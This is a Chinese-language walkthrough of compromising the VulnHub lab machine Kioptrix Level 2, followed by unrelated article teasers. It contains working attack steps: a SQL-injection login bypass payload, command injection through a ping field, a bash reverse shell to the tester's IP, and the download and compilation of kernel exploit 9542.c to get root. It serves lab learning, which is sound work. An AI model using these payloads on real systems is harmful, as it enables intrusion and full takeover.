vulnhub-Kioptrix_Level_2_update靶机的测试报告

news2024/12/24 17:03:32

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、解决检测不到IP的问题

2、信息搜集

3、Getshell

4、提权

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.202.134)

靶  机:Linux kioptrix.level2 2.6.9-55.EL

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录遍历)、burpsuite(测试sql注入)、searchspoilt(查找漏洞库)、gcc(编译C源码)、python3(web服务)

测试网址:http://192.168.202.164

二、测试目的

通过web漏洞getshell,寻找内核漏洞进行提权。

三、操作过程

1、解决检测不到IP的问题

该靶机直接打开会检测不到IP

解决办法:

1.关闭虚拟机,并移除

2.将.vmx文件中以 ethernet0 开头的条目删除并保存修改

3.将VirtualHW.version改为VMware的版本保存

4.重新添加网络适配器,原来的桥接删除

2、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.202.165

端口和服务扫描

nmap -sS -A -T4 -p- 192.168.202.165

开启了ssh服务(22端口)、web服务(80端口和443端口)、打印机服务(cups 631端口)

目录扫描

gobuster dir -u http://192.168.202.165 -w /usr/share/seclists/Discovery/Web-Content/direc2.3-medium.txt -x php,jsp,html,txt

主页是个后台登录框

manual页面是apache2.0手册

3、Getshell

从登录框入手,跑一下sql注入payload

跑出很多payload,存在万能密码漏洞

复制一个payload,修改到原来的包,放包

payload:

a'or' 1=1--

成功进入到后台页面

是个典型的rce漏洞案例

在ping命令后面通过连接符拼接执行命令

返回新的页面,可以执行命令

baidu.com | ls

拼接getshell的命令

执行不了nc命令,直接用bash命令反弹shell,kali端开启监听

nc -lvvp 666

bash -i >& /dev/tcp/192.168.202.134/666 0>&1

baidu.com | bash -i >& /dev/tcp/192.168.202.134/666 0>&1

成功获取到反弹shell

4、提权

寻找有用的文件

find / -perm -4000 -ls 2>/dev/null
find / -writable 2>/dev/null
sudo -l
uname -a

查找内核漏洞信息

searchsploit linux kernel 2.6.9 | grep 'Privilege Escalation'

使用的是9542.c脚本,这是本地提权脚本,需要上传到靶机编译执行

上传到靶机

searchsploit -p linux_x86/local/9542.c
cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c 9542.c
python3 -m http.server 111

靶机下载,需要在tmp目录下,拥有较高权限

cd /tmp
wget http://192.168.202.134:111/9542.c

编译并执行,成功获取root权限

gcc 9542.c -o ccc
./ccc
id

四、结论

比较简单的靶机,简单的sql注入和rce漏洞,Linux版本漏洞也很多。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2205802.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【springboot9730】基于springboot+vue的网吧管理系统

作者主页:Java码库 主营内容:SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app等设计与开发。 收藏点赞不迷路 关注作者有好处 文末获取源码 项目描述 随着信息技术和网络技术的飞速发展,人类已进…

摩托车一键启动兼容机械钥匙点火

摩托车无钥匙一键启动 工作原理 摩托车无钥匙一键启动系统的工作原理主要依赖于RFID无线射频技术和车辆身份编码识别系统。这种技术能够通过小型化、小功率的射频天线来识别车辆的身份,并与遥控系统结合,实现双重射频系统和双重防盗保护。这意味着&…

CV实战01 YOLOv5实现图像分割

网上翻了一天,没找到称心的教程,最后发现还是Ultralytics官方的教程文档好用!这里贴上官方教程一起学习! 【1:找到官方教程文档】 yolov5官方下载地址:GitHub - ultralytics/yolov5: YOLOv5 &#x1f680…

【p2p、分布式,区块链笔记 UPNP】: Libupnp test_init.c 02 初始化SDK --- UpnpInitPreamble

启动前全局资源配置 代码解析函数分析代码中的重要部分1. Winsock 初始化 (WinsockInit):2. 锁初始化资源 (UpnpInitMutexes):3. 句柄表HandleTable(SDK 内部资源的表)初始化:4.线程池初始化 (UpnpInitThreadPools):5. 回调函数设…

Android OpenGLES2.0开发(四):矩阵变换和相机投影

事物的本质是事物本身所固有的、深藏于‌现象背后并决定或支配现象的方面‌。 还记得我们上一篇绘制的三角形吗,我们确实能够顺利用OpenGL ES绘制出图形了,这是一个好的开始,但这还远远不够。我们定义的坐标是正三角形,但是绘制出…

解决无法安装“vue.volar“扩展,跟vscode版本不兼容问题

问题:安装volar插件的时候提示跟vscode版本不兼容 解决方案 1、进入VSCode插件市场,搜索Vue.volar(直达链接:volar下载界面) 2、点击download Extension(下载插件) 3、下载.vsix文件完成后&a…

杨中科 .netcore Linq 。一前期准备知识

为什么要学Linq 一、为什么要学LINQ? 让数据处理变得简单: 统计一个字符串中每个字母出现的频率(忽略大小写),然后按照从高到低的顺序输出出现频率高于2次的单词和其出现的频率。 var itemss.Where(c >char.lsLetter(c))//过滤非字母 .Select(c>char.ToLo…

【网络安全】CVE-2024-46990: Directus环回IP过滤器绕过实现SSRF

未经许可,不得转载。 文章目录 背景漏洞详情受影响版本解决方案背景 Directus 是一款开源 CMS,提供强大的内容管理 API,使开发人员能够轻松创建自定义应用程序,凭借其灵活的数据模型和用户友好的界面备受欢迎。然而,Directus 存在一个漏洞,允许攻击者绕过默认的环回 IP …

55100-3H-02微型法兰安装霍尔效应传感器

55100-3H-02微型法兰安装霍尔效应传感器应用领域如:位置和极限感应、无刷换向、RPM测量、直流电机、流量计量、角度感应、磁编码器。 概述 55100微型法兰安装霍尔效应传感器,尺寸为25.5mmx 11.00m,高度仅为3.00mm,可选择数字或可…

生物制药洁净室:设计、施工及常见问题解决

生物制药洁净室的设计施工要点对于保障生产环境的洁净度至关重要。生物制药洁净室的建设不仅是为了符合行业标准,更是确保产品安全和质量的重要环节。生物制药洁净室设计与生物制药洁净室施工是相辅相成的,接下来,我们将深入探讨这两方面的关…

交易中心态管理和情绪控制是第一位

情绪是交易中常见的障碍,无论是负面情绪还是喜悦等正面情绪,都可能成为妨碍交易的关键因素。交易的核心在于保持客观理性,而情绪的起伏往往不经意间扰乱我们的思绪。因此,成功的交易员若想突破自我,首要任务便是克服情…

事件轮询机制

引出闭包案例 for(var i 0; i < 5; i) {setTimeout(function () {console.log(i); // &#xff1f;}); } console.log(a); // 结果是什么&#xff1a;&#xff1f; 2.事件轮询机制&#xff08;Event Loop&#xff09; 事件轮询&#xff08;Event Loop&#xff09;是一个…

调整ApplyItem的界面

调整ApplyItem的界面 前言 在上一集&#xff0c;我们就完成了一个clickItem的一个函数&#xff0c;继承SessionFriendItem并通过它添加不同的Item&#xff0c;并且我添加了它的枚举类。 在上一集的最后&#xff0c;我们提了一嘴&#xff0c;我们要修改ApplyItem的样式。 分…

Flink 04 | 窗口介绍 - 无界数据流的核心

窗口介绍 Flink中Windows&#xff08;窗口&#xff09;是处理无界数据流的核心。因为无界数据集是不断增长的&#xff0c;无法直接对整个数据集进行操作。窗口将数据流分成有限大小的Buckets&#xff0c;我们可以在这些Buckets上应用计算。本文档重点介绍如何在 Flink 中选择合…

三菱FX3UPLC机械原点回归- DSZR/ZRN指令

机械原点回归用指令的种类 产生正转脉冲或者反转脉冲后&#xff0c;增减当前值寄存器的内容。可编程控制器的定位指令&#xff0c;可编程控制器的电源0FF后&#xff0c;当前值寄存器清零&#xff0c;因此上电后&#xff0c;请务必使机械位置和当前值寄存器的位置相吻合…

10.模拟实现s

前面我们了解了string类的常用接口使用&#xff0c;那么现在就来模拟实现一下。 1.constructor string.h namespace Ro {class string{public:string(){}string(const char* str){}~string(){}private:char* _str;size_t _size;size_t _capacity;}; } 为了和库里面的string…

Jenkins+kubernetes流水线构建java项目

在传统的业务环境中&#xff0c;我们的应用部署或者更新都是采用手工的方式&#xff0c;但是在企业内部&#xff0c;应用架构一般都采用微服务&#xff0c;大部分项目都会对应几十个、上百甚至上千个微服务&#xff0c;并且还不仅仅只有一个项目&#xff0c;所以采用收工方式上…

godot帧同步-关于“显示与逻辑分离”

很多教程说帧同步的关键是“显示与逻辑分离”&#xff0c;但是又没有具体讲解&#xff0c;我起初也没有搞懂这句话的意思&#xff0c;就直接上手开发帧同步了。在开发的过程中&#xff0c;一下子就悟了&#xff0c;所以分享一下。 显示与逻辑未分离&#xff08;单机&#xff0…

嵌入式中单链表基本实现

第一:单链表基本原理 依次读入表L=(a0,.....,an-1)中每一元素ai(假设为整型),若ai≠结束符(-1),则为ai创建一结点,然后插入表尾,最后返回链表的头结点指针H。 第二:单链表具体实现方法 1:实现单链表的时候,需要先定义基本文件link.h #ifndef __LINKLIST_H__ #define…

考华为认证拼了命,怎么还是没工作啊

在当今竞争激烈的就业市场中&#xff0c;网络工程领域的发展备受关注。当你疯狂地在某 BOSS 或者某联等招聘平台上浏览时&#xff0c;你必然会惊讶地发现&#xff0c;华为认证已赫然成为网络方向至关重要的资格认证之一&#xff0c;频繁地出现在形形色色的岗位 JD 里。 这一现…